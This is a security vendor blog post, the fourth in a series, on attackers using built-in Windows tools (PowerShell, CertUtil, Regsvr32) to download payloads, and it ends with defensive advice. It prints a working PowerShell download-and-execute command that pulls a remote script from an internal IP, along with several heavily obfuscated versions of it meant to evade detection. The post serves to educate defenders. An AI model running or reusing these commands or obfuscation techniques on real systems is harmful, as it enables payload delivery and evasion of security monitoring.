Cyber risk and advisory programs that identify security gaps and build strategies to address them.
MDR that provides improved detection, 24/7 threat hunting, end-to-end coverage and most of all, complete Response.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Visibility and response across your entire Microsoft security ecosystem.
XDR with Machine Learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Be protected by the best from Day 1.
24/7 Threat Investigation and Response.
Expert threat hunting, original research, and proactive threat intelligence.
TRU is foundational to our MDR service. No add-ons or additional costs required.
Stop ransomware attacks before they disrupt your business.
Detect and respond to zero-day exploits.
Protect against third-party and supply chain risk.
Adopt a risk-based approach to cybersecurity.
Protect your most sensitive data.
Meet cybersecurity regulatory compliance mandates.
Eliminate misconfigurations and policy violations.
Prevent business disruption by outsourcing MDR.
Meet insurability requirements with MDR.
Defend brute force attacks, active intrusions and unauthorized scans.
Safeguard endpoints 24/7 by isolating and mediating threats to prevent lateral spread.
Enhance investigation and threat detection across multi-cloud or hybrid environments.
Remediate critical misconfigurations, security vulnerabilities and policy violations across cloud and containerized environments.
Detect malicious insider and identity-based behavior leveraging machine learning models.
Our Threat Response Unit (TRU) publishes security advisories, blogs, reports, industry publications and webinars based on its original research and the insights driven through proactive threat hunts.
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company's mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
We believe a multi-signal approach is paramount to protecting your complete attack surface. See why eSentire MDR means multi-signal telemetry and complete response.
See how our 24/7 SOC Cyber Analysts and Elite Threat Hunters stop even the most advanced cyberattacks before they disrupt your business.
Choose the right mix of Managed Detection and Response, Exposure Management, and Incident Response services to strengthen your cyber resilience.
Try our interactive tools including the MITRE ATT&CK Tool, the SOC Pricing Calculator, the Cybersecurity Maturity Assessment, and our MDR ROI Calculator.
Read the latest security advisories, blogs, reports, industry publications and webinars published by eSentire's Threat Response Unit (TRU).
See why 2000+ organizations count on eSentire to build resilience and prevent business disruption.
This is the fourth blog post in a series discussing Living Off the Land tools and techniques. Successful exploitation could allow an adversary to escalate privilege, obtain sensitive information or download additional software.
In this blog post we will focus on tools that can be exploited to download additional payloads.
Living Off the Land tools for exploitation are popular amongst both sophisticated and unsophisticated adversaries. Their use reduces the likelihood of detection and may increase the required investigation time.
In relation to Living Off the Land tools, the exploitation phase encapsulates a massive number of attack methods. For the sake of brevity, this blog post focuses on three tools in particular: PowerShell, CertUtil and Regsvr32.
Unless appropriate steps are taken to both prevent and detect these threats, adversaries will continue exploiting these and similar tools to perform a plethora of malicious activity.
Exploitation is admittedly a broad topic. Two of the most commonly exploited programs that are used to retrieve additional payloads are PowerShell and CertUtil.
PowerShell is a scripting language designed for task automation and configuration management; this tool is extremely flexible and was discussed at length in the first installment of this series, Living Off the Land – The Reconnaissance Phase 1. In the context of exploitation, PowerShell obfuscation is heavily utilized in order to bypass and circumvent detection methods. It increases the difficulty for incident responders to quickly identify the purpose of the specific command.
CertUtil is a Windows program used to download and update certificates 2. In the past, adversaries have exploited CertUtil to download additional payloads after enticing users to open weaponized documents.
In 2016, a post exploitation technique was released that exploited the use of regsvr32.exe to download and execute remote files. It was dubbed ‘Squiblydoo’ and was used to bypass App Locker and other application whitelisting software. Today Squiblydoo is blocked by default using Windows 10 Home Defender but is still allowed on some versions of Windows 7.
This is by no means an exhaustive list. A more comprehensive list of Living Off the Land Tools has been made available on GitHub through various security researchers 3.
PowerShell is able to interpret commands that have been obfuscated to evade detection by security products and incident responders. In the below example we demonstrate a variety of obfuscation techniques adversaries have often employed. In these examples the PowerShell command will download a file from the internet and execute it.
<span>powershell</span> <span>-c</span> <span>"mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"</span>
<span>.(</span><span>"{1}{0}{3}{2}"</span><span>-f</span> <span>'owers'</span><span>,</span><span>'p'</span><span>,</span><span>'l'</span><span>,</span><span>'hel'</span><span>)</span> <span>-c</span> <span>(((</span><span>"{33}{31}{34}{16}{29}{17}{32}{6}{11}{27}{35}{7}{26}{20}{39}{12}{0}{13}{8}{10}{25}{22}{3}{23}{2}{15}{36}{18}{24}{28}{37}{21}{5}{9}{14}{30}{1}{38}{19}{4}"</span> <span>-f</span> <span>'dFile'</span><span>,</span><span>'te'</span><span>,</span><span>'ZRQTe'</span><span>,</span><span>'Bbn,B'</span><span>,</span><span>'1'</span><span>,</span><span>'ower'</span><span>,</span><span>'s'</span><span>,</span><span>'ient'</span><span>,</span><span>'R'</span><span>,</span><span>'she'</span><span>,</span><span>'QZRQ19'</span><span>,</span><span>'tem.'</span><span>,</span><span>'oa'</span><span>,</span><span>'(BbnZ'</span><span>,</span><span>'ll -f C'</span><span>,</span><span>'mp'</span><span>,</span><span>':'</span><span>,</span><span>'mp; '</span><span>,</span><span>'es'</span><span>,</span><span>'s'</span><span>,</span><span>'.Do'</span><span>,</span><span>'s1Bbn); p'</span><span>,</span><span>'aringZRQtest2.ps1'</span><span>,</span><span>'bnC:'</span><span>,</span><span>'t'</span><span>,</span><span>'2.168.0.115ZRQSh'</span><span>,</span><span>')'</span><span>,</span><span>'Net.We'</span><span>,</span><span>'2'</span><span>,</span><span>'ZRQTe'</span><span>,</span><span>':ZRQTempZRQ'</span><span>,</span><span>'k'</span><span>,</span><span>'(new-object Sy'</span><span>,</span><span>'m'</span><span>,</span><span>'dir C'</span><span>,</span><span>'bCl'</span><span>,</span><span>'ZRQt'</span><span>,</span><span>'.p'</span><span>,</span><span>'st2.p'</span><span>,</span><span>'wnl'</span><span>)).</span><span>"Rep`laCE"</span><span>((</span><span>[CHAR]</span><span>90+</span><span>[CHAR]</span><span>82+</span><span>[CHAR]</span><span>81),</span><span>[StRiNg][CHAR]</span><span>92).</span><span>"r`ePL`ACe"</span><span>((</span><span>[CHAR]</span><span>66+</span><span>[CHAR]</span><span>98+</span><span>[CHAR]</span><span>110),</span><span>[StRiNg][CHAR]</span><span>39))</span>
<span>${]]]]]]]]]]]]}</span> <span>=+</span> <span>$()</span> <span>;</span><span>${]]]]]]}</span> <span>=</span> <span>${]]]]]]]]]]]]}</span><span>;</span><span>${]]]]}</span> <span>=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]}=++</span> <span>${]]]]]]]]]]]]}</span><span>;</span> <span>${]]]]]]]}=</span> <span>++${]]]]]]]]]]]]}</span> <span>;</span><span>${]]}=++${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]]]}=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]}</span> <span>=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span><span>${]]]]]}</span> <span>=++${]]]]]]]]]]]]}</span> <span>;</span><span>${]]]]]]]]}</span> <span>=</span> <span>++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]}</span> <span>=</span> <span>++${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]]}</span> <span>=</span><span>"["</span><span>+</span> <span>"$(@{ }) "</span><span>[</span> <span>${]]]]]}]+</span><span>"$(@{ })"</span><span>[</span> <span>"${]]]]}${]]]]]]]]]}"</span><span>]+</span><span>"$( @{} ) "</span><span>[</span> <span>"${]}${]]]]]]}"</span> <span>]</span> <span>+</span><span>"$? "</span><span>[</span> <span>${]]]]}]+</span> <span>"]"</span> <span>;</span><span>${]]]]]]]]]]]]}=</span><span>""</span><span>.(</span><span>"$(@{ })"</span><span>[</span> <span>"${]]]]}"</span><span>+</span><span>"${]]}"</span><span>]+</span> <span>"$( @{} )"</span><span>[</span> <span>"${]]]]}"</span> <span>+</span> <span>"${]]]}"</span><span>]</span> <span>+</span><span>"$( @{} ) "</span><span>[${]]]]]]}</span> <span>]</span> <span>+</span><span>"$( @{ } ) "</span><span>[${]]}</span> <span>]+</span><span>"$?"</span><span>[</span> <span>${]]]]}]</span> <span>+</span><span>"$(@{ })"</span><span>[${]]]]]]]}])</span> <span>;</span> <span>${]]]]]]]]]]]]}=</span><span>"$(@{ } ) "</span><span>[</span><span>"${]]]]}"</span><span>+</span> <span>"${]]}"</span><span>]</span> <span>+</span><span>"$(@{})"</span><span>[${]]}]+</span><span>"${]]]]]]]]]]]]}"</span><span>[</span> <span>"${]}"</span> <span>+</span> <span>"${]]]]]}"</span> <span>]</span> <span>;</span> <span>"${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]}+ ${]]]]]]]]]]}${]]}${]]]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]}${]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]} +${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]}${]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]} + ${]]]]]]]]]]}${]]]]]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]}+ ${]]]]]]]]]]}${]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]}${]} + ${]]]]]]]]]]}${]]]]]]]]}${]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]}${]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]}${]]]}+ ${]]]]]]]]]]}${]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]} + ${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]]]]]]]}${]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]}${]]]]}+ ${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]}${]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]} +${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]}+ ${]]]]]]]]]]}${]]}${]]]}+ ${]]]]]]]]]]}${]]}${]]]]]]]]}+${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]}${]}+ ${]]]]]]]]]]}${]]]]]]]]}${]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]}+${]]]]]]]]]]}${]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]}${]]}+ ${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]}${]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]}+ ${]]]]]]]]]]}${]]]]]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]} +${]]]]]]]]]]}${]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]}+${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]}${]]]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]}${]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]}+ ${]]]]]]]]]]}${]]}${]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]}${]]} | ${]]]]]]]]]]]]} "</span><span>|&${]]]]]]]]]]]]}</span>
<span>sv</span> <span>(</span><span>'n'</span><span>+</span><span>'209t'</span><span>+</span><span>'e'</span><span>)</span> <span>(</span><span>[cHAr[]]</span><span>" ))93]RAHc[]GnirTs[,'JPW'(ECalPeR.)29]RAHc[]GnirTs[,'k2B'(ECalPeR.)43]RAHc[]GnirTs[,)37]RAHc[+56]RAHc[+57]RAHc[((ECalPeR.)'IA'+'K'+'1'+'sp.2tsetk2Bpm'+'eTk'+'2B:C '+'f- llehsr'+'ewop ;)JPW1s'+'p.2t'+'set'+'k'+'2Bpm'+'eTk2B:'+'C'+'JP'+'W,J'+'PW1sp.2'+'t'+'s'+'e'+'tk2Bgni'+'rah'+'S'+'k2B511'+'.0.86'+'1.291k2Bk2BJPW(eliF'+'daolnwoD.)t'+'neil'+'Cb'+'eW.t'+'eN.metsy'+'S tcej'+'bo-'+'wen( ;'+'pmeTk2B:C rid'+'kmIAK c- lle'+'h'+'sre'+'wop'( ()'X'+]03[EMOHsp$+]4[emoHSp$ ( ."</span><span>)</span><span>;</span> <span>[ARrAY]</span><span>::</span><span>ReveRSE(</span><span>$N209te</span><span>)</span> <span>;</span> <span>IEX(</span> <span>-Join</span><span>$N209te</span><span>)</span>
<span>INvoKE-EXprEssIon</span><span>(</span><span>nEW-oBjECt</span> <span>sYSTEM.iO.stREAMReAder((</span><span>nEW-oBjECt</span> <span>sYsteM.iO.CompREssioN.deFLAtesTReAm(</span><span>[sySTeM.iO.MeMOrYSTreAm] [SYSteM.convErT]</span><span>::</span><span>FromBaSe64sTRInG(</span> <span>'7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iVtVVXjfzvCzT7Wn60eLtrKjTk0e/75t8sTpMt5b51XY1+el82qavr5s2X4xf5O34u/nkpCzyZXtn/LS6WpZVNntWlPnWx7/v77v7cG+8++nBeGe8u3v/9309z+piefH7tnnT7o1Xze7Ho48VuPfZncPUR+Pc9O+afPT/AA=='</span><span>),</span> <span>[iO.cOMPRESsION.cOmPrEssIOnModE]</span><span>::</span><span>Decompress</span> <span>)</span> <span>),</span><span>[sYStEm.TeXT.ENcoDInG]</span><span>::</span><span>AScIi)).reaDTOEND(</span> <span>)</span>
The PowerShell script ‘Invoke-Obfuscation’ has been created to automate the obfuscation process 4. Invoke-Obfuscation allows the user to conceal a PowerShell command’s true purpose using a list of pre-defined obfuscation techniques.
The example below shows how difficult it is for an incident responder to determine what the PowerShell command is doing after Invoke-Obfuscation has been applied.
<span>powershell</span> <span>-c</span> <span>"mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"</span>
<span>neW-OBjEcT</span> <span>iO.ComPressIOn.dEFlaTEStREAM(</span> <span>[systEM.Io.mEmORystREam] [cOnVert]</span><span>::</span><span>FrOmBase64StRINg(</span><span>'7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0l+Ybm19/pPpx99aPK2/9fGd8Yvjxen37o12d0d739/+TnW2/PjjO+lWuvXx6uNPPq6u8rqZ0y85/b8s0236MU3pH2rwVX29oN/e0v9nBf1T0//Tk0e/N/34Cn9ep59Qk+989QavL+hX/Lk6RKst+meZX21Xk5/Op1+hZfqVQrim/7do8/q6afEVfqev62sGM+bW6IIbv8jxt35w3Zov01S+HtM/38V7kxPgDyzxAhBZtnfor7HATdHLJ/wvffD0Ywx8WdpePtEvKvqRYbj0/2cAVuZbl2Xze38HX//e3/lq9+GeeUH736V/Pz0AGjuCqPYhXwqZDMLXaHyf/v97uzFxg+989XpuKMrkoO8zgChsk08EJP1/eUGICNk+MWT4CgTNXW/0fdPujVfN7iUG2YwuS2mY2lca+ofm8it9QfDAb4qIJTP6lBleYea/81VrUdU5o67oB2iwkqlWalLv/Df947p3vd+xHMFdUavDlFnSDpVfveIJxdfEqDmxKH2xfc5d+JjS9yePdLKV2a6JUG8MVdBAR8CjNC0tHPqnzZVqPD93MKJXp/TPy+fZNN9iYhBI+ndk3/q9nhwIunfGr06l3db3pvNjvPr9XUz4gSKIT+kj+nXnQHjefUq/7e7epy5H32swlYB4trz4/vfo55T+r/Don3sP0zt3SKjr05dldoLOTr59XH//wf1P5JdPP9Vf7n96Z/Tx79tveWBa7u7um9/2dqnj12/qs+Xn35eP7j28c+f/AQ=='</span> <span>),</span> <span>[Io.cOmPRESSIon.cOMpReSsionMoDe]</span><span>::</span><span>DEComPReSs</span> <span>)|</span><span>FoREACh</span><span>{</span><span>neW-OBjEcT</span> <span>SystEm.IO.sTreAmrEadEr(</span> <span>$_</span><span>,</span><span>[Text.eNCoDing]</span><span>::</span><span>aSCii)</span> <span>}|</span> <span>fOREAch</span><span>{</span> <span>$_</span><span>.rEaDtOend()}</span> <span>)</span> <span>|&(</span> <span>$pSHOMe</span><span>[21]+</span><span>$PShomE</span><span>[34]+</span><span>'x'</span><span>)</span>
The above PowerShell command was obfuscated via command token obfuscation, using the “string” and “whitespace” options, concatenating the entire command and then compressing it. The result is a command that is unrecognizable to human eyes but can still be immediately executed by PowerShell.
CertUtil has been exploited by adversaries to circumvent security products in order to download payloads. As recently as March 2018, CertUtil has been used in the wild in targeted attacks; the technique has been added into the Sanny malware family to download encrypted BAT files 5.
In the example below you can see a base64 encoded file being downloaded from a webserver. Once it has been decoded it can be executed by another program.
Figure 1: CertUtil downloading an external file
Adversaries can still use Regsvr32.exe on some versions of Windows 7 to download and execute files.
The example below shows the ability to download and execute JavaScript embedded inside payload.scr.
Figure 2: Regsvr32 executing JavaScript
There are both broad and specific steps to help defend against the tools discussed in this blog post. Ensuring that employees are aware of ongoing threats and giving them the training to deal with potentially hostile situations strengthens the last line of defence.
The risks associated with Regsvr32 can be minimized by adding firewall rules to deny connections initiated by the Regsvr32.exe process. Process monitoring can also be employed to quickly identify the unusual command-line arguments, modified files or network connection that an adversary may make using CertUtil and Regsvr32 6.
As discussed in previous blog posts enabling PowerShell logging can help identify encoded PowerShell commands and record unusual behavior performed by adversaries 7.
In conclusion, Living Off the Land tools are actively being used by adversaries to complete the exploitation stage of their attacks. This minimizes the chances of detection, lessening the time for incident responders to identify and remediate the issue. The ease and effectiveness of the Living Off the Land exploitation tools discussed in this blog makes it clear why adversaries are frequently employing these and similar tools. Using the mitigation strategies listed above will help companies to discover and quickly remediate a wide variety of attacks.
In the next and final blog post in this series, the focus is on the Living Off the Land tools used in stage six of the Cyber Kill Chain, Command and Control.
Sources
[1] https://www.esentire.com/blog/living-off-the-land-the-reconnaissance-phase/
[2] https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
[3] https://github.com/api0cradle/LOLBAS
[4] https://github.com/danielbohannon/Invoke-Obfuscation
[5] https://threatpost.com/sanny-malware-updates-delivery-method/130803/